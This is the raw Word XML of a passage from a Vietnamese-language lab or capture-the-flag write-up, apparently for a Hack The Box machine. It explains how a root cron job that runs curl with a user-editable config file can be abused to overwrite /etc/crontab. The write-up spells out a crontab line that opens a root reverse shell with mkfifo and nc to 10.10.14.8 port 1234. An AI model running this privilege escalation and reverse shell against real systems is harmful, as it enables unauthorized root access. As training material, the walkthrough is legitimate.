          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cách khai thác 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCAAD13" w14:textId="235E8C7E" w:rsidR="00F41440" w:rsidRDefault="00F41440">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D408866" w14:textId="444D2027" w:rsidR="00F41440" w:rsidRDefault="00C805E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Theo curl, -K chỉ định tập tin cấu hình. Cron dùng input để cấu hình và đầu ra là report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD75CF2" w14:textId="2A159585" w:rsidR="00C805EB" w:rsidRDefault="00C805EB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1915CE7C" w14:textId="5E82DFE5" w:rsidR="00C805EB" w:rsidRDefault="00C805E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Người dùng floris có thể chỉnh sửa tập tin input vì vậy chúng ta có thể ghi cấu hình theo ý của mình. Tham số output có thể được dùng để chỉ định đầu ra. Chúng ta có thể tạo crontab độc hại và ghi đè nó trên máy ảo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD44C73" w14:textId="3485C613" w:rsidR="00C805EB" w:rsidRDefault="00C805EB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B0C88C5" w14:textId="7C1BEAE8" w:rsidR="00C805EB" w:rsidRDefault="00C805E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Đầu tiên tạo crontab độc hại trên máy cục bộ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560FCCB4" w14:textId="65A81AB6" w:rsidR="00C805EB" w:rsidRDefault="00C805EB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D15B458" w14:textId="6C01AA24" w:rsidR="00EB43A2" w:rsidRPr="00EB43A2" w:rsidRDefault="00EB43A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB43A2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cp /etc/crontab .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DA1654" w14:textId="77777777" w:rsidR="00E3328B" w:rsidRPr="00ED1ED2" w:rsidRDefault="00E3328B" w:rsidP="00E3328B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1ED2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo '* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F04E6" w14:textId="18DB599A" w:rsidR="00C805EB" w:rsidRPr="00ED1ED2" w:rsidRDefault="00E3328B" w:rsidP="00E3328B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1ED2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2&gt;&amp;1|nc 10.10.14.</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED1ED2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED1ED2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1234 &gt;/tmp/f ' &gt;&gt; crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5941DDE4" w14:textId="5EFB461B" w:rsidR="00E3328B" w:rsidRDefault="00E3328B" w:rsidP="00E3328B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68BD60AF" w14:textId="4BB6674B" w:rsidR="00E3328B" w:rsidRDefault="00E3328B" w:rsidP="00E3328B">
      <w:pPr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Chỉnh sửa tập tin input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429DE768" w14:textId="6167C023" w:rsidR="00E3328B" w:rsidRDefault="00E3328B" w:rsidP="00E3328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6684AD71" wp14:editId="69C5A942">
            <wp:extent cx="3949700" cy="6858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97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42E763" w14:textId="75B3B7A6" w:rsidR="00EB43A2" w:rsidRDefault="00EB43A2" w:rsidP="00E3328B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9950B9" w14:textId="7243B72B" w:rsidR="00EB43A2" w:rsidRDefault="00FF7E69" w:rsidP="00E3328B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5827F45C" wp14:editId="577D055D">
            <wp:extent cx="5943600" cy="1918335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1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D6EC86" w14:textId="123CACEB" w:rsidR="00FF7E69" w:rsidRDefault="00FF7E69" w:rsidP="00E3328B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC27DDA" w14:textId="77777777" w:rsidR="00FF7E69" w:rsidRDefault="00FF7E69" w:rsidP="00E3328B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9D759D" w14:textId="76B5D835" w:rsidR="00ED1ED2" w:rsidRDefault="00ED1ED2" w:rsidP="00E3328B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393450BB" w14:textId="77777777" w:rsidR="00ED1ED2" w:rsidRDefault="00ED1ED2" w:rsidP="00E3328B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8F9554" w14:textId="77777777" w:rsidR="00E3328B" w:rsidRDefault="00E3328B" w:rsidP="00E3328B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B748F1" w14:textId="77777777" w:rsidR="004F10EF" w:rsidRDefault="004F10EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CE2857" w14:textId="7AEE7029" w:rsidR="00B156B3" w:rsidRDefault="00B156B3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2851DDF1" w14:textId="77777777" w:rsidR="00B156B3" w:rsidRDefault="00B156B3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001A1961" w14:textId="044C3B9D" w:rsidR="009E6518" w:rsidRDefault="009E6518">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B97B14D" w14:textId="77777777" w:rsidR="009E6518" w:rsidRPr="00D80DEC" w:rsidRDefault="009E6518">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009E6518" w:rsidRPr="00D80DE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4877"/>
    <w:rsid w:val="00026338"/>
    <w:rsid w:val="00087A00"/>
    <w:rsid w:val="000A441F"/>
    <w:rsid w:val="000C2AED"/>
    <w:rsid w:val="001018EB"/>
    <w:rsid w:val="00142FF1"/>
    <w:rsid w:val="001D1F63"/>
    <w:rsid w:val="00214A55"/>
    <w:rsid w:val="002A325F"/>
    <w:rsid w:val="002B1176"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00415905"/>
    <w:rsid w:val="004C3878"/>
    <w:rsid w:val="004D21E2"/>
    <w:rsid w:val="004F10EF"/>
    <w:rsid w:val="00520EAE"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00665E65"/>
    <w:rsid w:val="006C5932"/>
    <w:rsid w:val="00773466"/>
    <w:rsid w:val="007776AC"/>
    <w:rsid w:val="007E637F"/>
    <w:rsid w:val="009075C5"/>
    <w:rsid w:val="00921728"/>
    <w:rsid w:val="009B0D47"/>
    <w:rsid w:val="009D1E8E"/>
    <w:rsid w:val="009E6518"/>
    <w:rsid w:val="00AF3287"/>
    <w:rsid w:val="00B06447"/>
    <w:rsid w:val="00B156B3"/>
    <w:rsid w:val="00B81695"/>
    <w:rsid w:val="00BA1B7F"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C258ED"/>
    <w:rsid w:val="00C805EB"/>
    <w:rsid w:val="00CA1934"/>
    <w:rsid w:val="00CF62DA"/>
    <w:rsid w:val="00D34877"/>
    <w:rsid w:val="00D8081D"/>
    <w:rsid w:val="00D80DEC"/>
    <w:rsid w:val="00DF5565"/>
    <w:rsid w:val="00E3328B"/>
    <w:rsid w:val="00EA5720"/>
    <w:rsid w:val="00EB43A2"/>
    <w:rsid w:val="00ED1ED2"/>
    <w:rsid w:val="00F41440"/>
    <w:rsid w:val="00F4771A"/>
    <w:rsid w:val="00FF7E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301F9273"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EC170ECA-C605-2B41-B3C1-AF1DD04809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27</TotalTime>
  <Pages>8</Pages>
  <Words>242</Words>
  <Characters>1385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45</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-12T14:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-12T16:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>